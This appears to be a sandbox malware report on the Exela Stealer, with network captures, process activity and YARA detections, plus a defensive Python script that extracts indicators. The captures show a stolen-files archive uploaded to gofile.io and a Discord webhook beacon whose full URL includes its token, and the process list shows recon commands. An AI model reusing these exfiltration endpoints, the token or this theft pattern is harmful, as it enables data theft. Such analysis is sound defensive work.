2025-01-01 01:53:25 UTC | 16384 | OUT | Data Raw: 85 23 a2 e2 88 d3 fd 0f d2 6f c9 0a b2 2a b9 75 04 d0 78 cf 36 05 0a 24 d2 74 6f c4 98 fd 0d 4f dd 44 43 12 cc a7 13 44 3f 31 86 f7 5e 7d 59 01 39 6e b1 6f 1f d1 58 7b 93 d7 3d df b3 0a e9 53 bb 29 6e ad 63 dc 78 dc 93 4f c2 aa 0d 3d 16 9d 88 49 1c 97 d8 35 8c d5 58 c8 dc cd 7b b2 a7 ab 42 d4 b6 bb d0 f7 7c 4b 84 23 eb 2c 3e ce 3c 7a 58 c9 b5 f9 cc 1a f8 e6 ed d2 b9 be 3e 30 e8 55 6b d8 c2 65 dc ae 79 1d 2c ce ce f8 cc 0c 36 94 86 1a 37 9a 63 cd 51 cf 8d 1d 9c 4b 67 9e 76 44 91 9e 6d 18 bf 20 b7 38 05 09 c0 7e 0c 7a bb 62 8d 06 48 9e a3 6d dd 53 5d d6 2e aa 73 f4 22 cf 55 8c 55 30 c1 ed b8 24 39 3b ce f1 71 40 b8 09 d6 d8 39 8c a1 73 f7 ab f9 e3 bc bb 47 35 d5 1f 86 94 5e 13 ea 8d 50 96 72 46 55 cd 02 b1 1c e9 22 12 1b 77 b1 70 00 ce 0e 0b a6 0a a9 9f 25
Data Ascii: #o*ux6$toODCD?1^}Y9noX{=S)ncxO=I5X{B|K#,><zX>0Ukey,67cQKgvDm 8~zbHmS].s"UU0$9;q@9sG5^PrFU"wp%
2025-01-01 01:53:25 UTC | 16384 | OUT | Data Raw: b3 2e 99 cf af fd f8 85 de bd b2 eb 0e c1 d8 92 cd 01 98 ed ee 0b ef 74 ce a5 bb 7b 5d cf 69 25 ad 63 f0 c5 51 15 2c eb dc 56 07 2d e5 b8 8a dc ec eb 39 60 78 4c 5c 18 e4 45 0d b8 6f db fc 98 66 7a 8a a1 45 4c cc 44 61 93 af fe 70 3d c6 75 e6 42 76 2e 14 92 f3 79 1b e1 35 96 dd 43 33 6c 03 00 ec 4e 4a 9f ea 6a 51 1b fa c8 55 b1 2d 5d e5 2c 50 5c f4 da b6 de bf cf 6b 95 63 bf 31 26 83 07 65 58 b6 33 c0 29 b7 7e 33 f2 2d 51 a6 2b 2e d9 a2 63 7a d4 12 9c 27 3a 1d be 49 80 f8 a2 a6 3f 76 16 03 b7 26 bc b6 8d be 8f a7 4f 54 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb
Data Ascii: .t{]i%cQ,V-9`xL\EofzELDap=uBv.y5C3lNJjQU-],P\kc1&eX3)~3-Q+.cz':I?v&OTP{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D
2025-01-01 01:53:25 UTC | 16384 | OUT | Data Raw: 43 46 58 2e 70 6e 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 44 c5 f1 8b 38 e0 70 ff 83 b4 bd 30 26 92 58 14 af 58 73 c4 ae 41 e3 2e dd 2e 97 97 3b 44 2c 62 2a 16 9c 5f 65 15 a5 ec 92 be cd 8d 9a cc 70 4e e1 a5 3e ba 23 dc 6a 95 a1 64 ab c9 f2 15 5b 30 04 6d 13 0d 90 4a 46 5b 2f c5 d8 6f 68 65 1c c3 98 bd a1 d1 4c 78 2f eb 1e 6c 82 58 9a 35 e7 08 d2 c6 dc 95 48 33 40 86 eb b4 3c af 12 87 79 d3 ea a9 0d c3 74 46 a9 77 22 d5 8d b1 3e e1 79 0b bb aa 24 5f a6 77 3e 0b 3d 98 de 3b e9 58 4e 73 c3 59 df f2 d8 b9 c3 d6 e2 80 82 49 c9 86 e9 ab c4 8d 01 66 f2 de 87 1b 37 94 8e d2 df 83 98 1c 85 fd fb ab d4 24 f3 b8 0e 27 9b 2a fd de a0 dc 96 9b c6 fd e8 f3 29 3e 43 3a 97 e0 e5 49 1f 7f 27 69 ff 0d 53 f7 ea 6b e9 71 93 ec 59 e3 1e 93 e5 24 29 30 88 f6 e9 c4 c7 51 a3 19
Data Ascii: CFX.pngI@!DD8p0&XXsA..;D,b*_epN>#jd[0mJF[/oheLx/lX5H3@<ytFw">y$_w>=;XNsYIf7$'*)>C:I'iSkqY$)0Q
2025-01-01 01:53:25 UTC | 13552 | OUT | Data Raw: 3b 05 1e 9e 16 4e d1 aa 4b 66 eb 6b 15 67 4d 04 a9 f1 07 a3 44 6a 68 a5 d3 07 74 34 58 ef b0 bc 92 4e 39 9e c9 86 90 27 26 93 97 ce 72 97 15 d0 0f f9 b6 d8 6e d0 63 ce ec 13 cd 1e 89 28 07 b5 ce cd 28 6b 5c 59 7a 28 9f 7d f3 df ed 00 c5 c0 c9 c0 cd b1 49 e8 7a dc ed a5 81 5f 47 b4 f5 b5 7c e4 dc 9c 48 eb ea 75 24 a2 bb 98 50 c5 86 99 26 27 e1 ae ef 83 62 55 1c 59 4e e8 37 59 2b a5 75 1a ce 96 15 86 5e 39 3d 87 87 60 97 4a 8f 91 c6 92 b3 50 cd 8a 76 96 16 dd aa 99 bb 65 eb 40 62 d9 73 01 57 00 a3 99 c7 57 a8 18 86 5f 46 f1 5a ce f1 e4 2f 62 cc 4d f8 bd 3e 20 5b 06 9c 1e da 76 da bb 96 84 f2 38 50 4e 6d a5 7e f5 e8 a0 35 bd ec 77 3c 03 8d 5f 5f f3 a9 d9 29 ee 76 ba 8c 5d 65 38 cb 75 db 2a b8 da 15 2b 67 da e8 5e 2c 35 6f d5 02 09 dd 8e aa f1 2e f9 62 ef db
Data Ascii: ;NKfkgMDjht4XN9'&rnc((k\Yz(}Iz_G|Hu$P&'bUYN7Y+u^9=`JPve@bsWW_FZ/bM> [v8PNm~5w<__)v]e8u*+g^,5o.b
2025-01-01 01:53:25 UTC | 2 | OUT | Data Raw: 0d 0a
Data Ascii:
2025-01-01 01:53:25 UTC | 38 | OUT | Data Raw: 2d 2d 66 66 31 39 65 38 38 35 31 61 33 32 34 38 62 33 39 35 39 39 63 65 38 66 34 34 38 63 30 61 39 36 2d 2d 0d 0a
Data Ascii: --ff19e8851a3248b39599ce8f448c0a96--
2025-01-01 01:53:27 UTC | 449 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.1
Date: Wed, 01 Jan 2025 01:53:27 GMT
Content-Type: application/json
Content-Length: 439
Connection: close
Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2025-01-01 01:53:27 UTC | 439 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 36 39 36 34 30 36 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 75 6b 68 45 67 73 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 38 65 39 34 73 67 36 73 36 79 73 63 44 44 38 6a 59 39 4d 39 37 4f 4d 4b 30 36 74 69 63 33 57 62 22 2c 22 69 64 22 3a 22 66 65 32 34 63 38 35 63 2d 38 64 32 35 2d 34 36 33 34 2d 61 31 32 62 2d 30 63 39 66 31 37 39 61 62 34 36 30 22 2c 22 6d 64 35 22 3a 22 38 62 30 36 35 39 31 31 35 38 36 30 38 63 30 64 61 64 65 33 63 33 64 39 33 32 37 35 30 65 62 38 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 35 36 39
Data Ascii: {"data":{"createTime":1735696406,"downloadPage":"https://gofile.io/d/ukhEgs","guestToken":"8e94sg6s6yscDD8jY9M97OMK06tic3Wb","id":"fe24c85c-8d25-4634-a12b-0c9f179ab460","md5":"8b06591158608c0dade3c3d932750eb8","mimetype":"application/zip","modTime":173569
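Session 4 is the exfiltration itself: a multipart upload of StealedFilesByExela.zip to store1.gofile.io, answered with the download page, file id and server-side md5 of the archive; the session that follows it is the Discord webhook beacon. As an added example, not part of the Joe Sandbox report and not the stealer's own code, the Python below pulls the indicators a detection engineer would keep from such rows: the scripted aiohttp User-Agent, the upload endpoint and part filename, the directory names from the zip local file headers at the start of the first chunk (scanned signature by signature, so a chunk that stops mid-header, as the page's first 16384-byte chunk does, is handled), the webhook ID (the token is deliberately kept out of the indicator list), and the drop location from the gofile reply. The inputs are constructed from the visible rows; the gofile reply and the webhook body are cut off on the page, so shortened copies with only the visible fields are used, and the guest token is replaced by a placeholder.

```python
import json
import re
import struct

ZIP_LOCAL_SIG = b"PK\x03\x04"
ZIP_LOCAL_FMT = "<4sHHHHHIIIHH"              # 30-byte zip local file header
ZIP_LOCAL_LEN = struct.calcsize(ZIP_LOCAL_FMT)
WEBHOOK_RE = re.compile(r"^/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]+)$")


def hex_row_to_bytes(row: str) -> bytes:
    """Turn a report row such as '... OUTData Raw: 50 4b 03 04 ...' into bytes."""
    _, _, hexpart = row.partition("Data Raw:")
    return bytes.fromhex(hexpart)


def zip_entry_names(chunk: bytes) -> list[str]:
    """Entry names from the zip local file headers inside a captured upload chunk.
    Scans for the signature instead of walking sizes, and stops cleanly when a
    header or a name runs past the end of the captured bytes."""
    names, pos = [], 0
    while True:
        pos = chunk.find(ZIP_LOCAL_SIG, pos)
        if pos < 0 or pos + ZIP_LOCAL_LEN > len(chunk):
            return names
        fields = struct.unpack_from(ZIP_LOCAL_FMT, chunk, pos)
        name_len, extra_len = fields[9], fields[10]
        start = pos + ZIP_LOCAL_LEN
        if name_len == 0 or start + name_len > len(chunk):
            return names
        name = chunk[start:start + name_len].decode("cp437")
        if name.isprintable():
            names.append(name)
        pos = start + name_len + extra_len


def parse_request(raw: str) -> tuple[str, str, dict]:
    """Split a captured request (request line plus headers) into method, path
    and a dict keyed by lower-cased header name."""
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def request_indicators(raw: str, body: bytes = b"") -> list[str]:
    """Indicators worth keeping from one captured request."""
    method, path, headers = parse_request(raw)
    host, ua = headers.get("host", ""), headers.get("user-agent", "")
    found = []
    if ua.startswith("Python/") or "aiohttp" in ua:
        found.append("ua:" + ua)                          # scripted client, not a browser
    if host.endswith("gofile.io") and method == "POST" and path == "/uploadFile":
        found.append("upload:" + host)
    part = re.search(rb'filename="([^"]+)"', body)        # multipart part header
    if part:
        found.append("upload-filename:" + part.group(1).decode("utf-8", "replace"))
    found.extend("zip-entry:" + n for n in zip_entry_names(body))
    hook = WEBHOOK_RE.match(path)
    if hook and host.endswith("discord.com"):
        found.append("discord-webhook-id:" + hook.group(1))   # token kept out of IOC lists
        try:
            sender = json.loads(body.decode("utf-8")).get("username", "")
        except (UnicodeDecodeError, ValueError, AttributeError):
            sender = ""
        if sender:
            found.append("webhook-username:" + sender)
    return found


def gofile_drop_location(response_body: str) -> dict:
    """From the gofile.io upload reply keep what a takedown request needs."""
    data = json.loads(response_body)["data"]
    return {key: data[key] for key in ("downloadPage", "id", "md5")}


# Constructed from the session 4 rows: the multipart part header and the start of
# the first 16384-byte chunk, cut at the chunk boundary mid-header as on the page.
GOFILE_UPLOAD_REQ = """POST /uploadFile HTTP/1.1
Host: store1.gofile.io
User-Agent: Python/3.11 aiohttp/3.9.5
Content-Length: 79291
Content-Type: multipart/form-data; boundary=ff19e8851a3248b39599ce8f448c0a96"""
GOFILE_UPLOAD_BODY = (
    b'--ff19e8851a3248b39599ce8f448c0a96\r\nContent-Type: application/x-zip-compressed\r\n'
    b'Content-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"\r\n\r\n'
    + hex_row_to_bytes(
        "2025-01-01 01:53:25 UTC16384OUTData Raw: "
        "50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 "
        "44 54 42 5a 47 49 4f 4f 53 4f 2f "
        "50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 "
        "44 65 73 6b 74 6f 70 2f "
        "50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 "
        "44 6f 63 75 6d 65 6e 74 73 2f "
        "50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 "
        "44 6f 77 6e 6c 6f 61 64 73 2f "
        "50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59"))     # next header cut off here
# Shortened copy of the reply (the page cuts it after modTime); guest token replaced.
GOFILE_RESPONSE = ('{"data":{"createTime":1735696406,"downloadPage":"https://gofile.io/d/ukhEgs",'
                   '"guestToken":"<redacted>","id":"fe24c85c-8d25-4634-a12b-0c9f179ab460",'
                   '"md5":"8b06591158608c0dade3c3d932750eb8","mimetype":"application/zip"}}')
# Constructed from the Discord webhook session; only the body's visible leading fields.
DISCORD_REQ = """POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
Host: canary.discord.com
User-Agent: Python/3.11 aiohttp/3.9.5
Content-Type: application/json"""
DISCORD_BODY = json.dumps({"username": "Exela Stealer", "embeds": [
    {"title": "***Exela Stealer***", "description": "***Stealed Files***",
     "url": "https://t.me/ExelaStealer"}]}).encode()

if __name__ == "__main__":
    for raw, body in ((GOFILE_UPLOAD_REQ, GOFILE_UPLOAD_BODY), (DISCORD_REQ, DISCORD_BODY)):
        print("\n".join(request_indicators(raw, body)))
    print(gofile_drop_location(GOFILE_RESPONSE))
```

The zip walk uses signature scanning on purpose: the sandbox shows the upload in 16384-byte pieces, and an entry whose sizes live in a trailing data descriptor (general-purpose flag bit 3) would have a zero compressed size in its header, so walking by declared sizes would either stop early or land in the middle of compressed data. The directory names recovered from the first chunk (Desktop/, Documents/, Downloads/ and the random-named folders) say what was taken even when the rest of the archive is not captured.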


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49760 | 162.159.137.232 | 443 | 3512 | C:\Users\user\Desktop\rename_me_before.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-01 01:53:27 UTC | 283 | OUT | POST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
Host: canary.discord.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.11 aiohttp/3.9.5
Content-Length: 419
Content-Type: application/json
2025-01-01 01:53:27 UTC | 419 | OUT | Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62
Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Stealed Files***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thumb
2025-01-01 01:53:27 UTC | 1331 | IN | HTTP/1.1 204 No Content
Date: Wed, 01 Jan 2025 01:53:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 8faee0347d4078d9-EWR
CF-Cache-Status: DYNAMIC
Set-Cookie: __dcfduid=31c82dbec7e311ef855a22435e575669; Expires=Mon, 31-Dec-2029 01:53:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
alt-svc: h3=":443"; ma=86400
X-Content-Type-Options: nosniff
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1735696409
x-ratelimit-reset-after: 1
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpsPHj1u%2B9fWyIxudRQOjKrjT7gGWW0XUZFURui3yZRN3Tmpubirazoj03UXRPgAkY5%2BqL4eXxoA1vVSPrMUncgPlWBPDn86Rd8N4crodBEMDY723jRpfyPsndBuc0JDqpfSug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
2025-01-01 01:53:27 UTC | 536 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 33 31 63 38 32 64 62 65 63 37 65 33 31 31 65 66 38 35 35 61 32 32 34 33 35 65 35 37 35 36 36 39 63 31 65 33 37 64 63 38 63 62 37 35 63 30 63 37 61 63 39 38 38 37 33 66 63 64 64 64 62 64 34 64 36 64 62 34 30 30 39 66 32 30 30 38 65 31 65 39 31 33 35 63 34 62 34 32 39 61 66 62 32 32 37 66 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 33 31 2d 44 65 63 2d 32 30 32 39 20 30 31 3a 35 33 3a 32 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 30 39 39 61 35 38 30 33 63 35 37 37 63 33
Data Ascii: Set-Cookie: __sdcfduid=31c82dbec7e311ef855a22435e575669c1e37dc8cb75c0c7ac98873fcdddbd4d6db4009f2008e1e9135c4b429afb227f; Expires=Mon, 31-Dec-2029 01:53:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e099a5803c577c3


Target ID: 0
Start time: 20:52:57
Start date: 31/12/2024
Path: C:\Users\user\Desktop\rename_me_before.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\rename_me_before.exe"
Imagebase: 0x7ff6404e0000
File size: 11'803'970 bytes
MD5 hash: 8B8040D5875E4C41ED5091F92021A16B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 20:52:58
Start date: 31/12/2024
Path: C:\Users\user\Desktop\rename_me_before.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\rename_me_before.exe"
Imagebase: 0x7ff6404e0000
File size: 11'803'970 bytes
MD5 hash: 8B8040D5875E4C41ED5091F92021A16B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 20:53:00
Start date: 31/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "ver"
Imagebase: 0x7ff6bee00000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:20:53:00
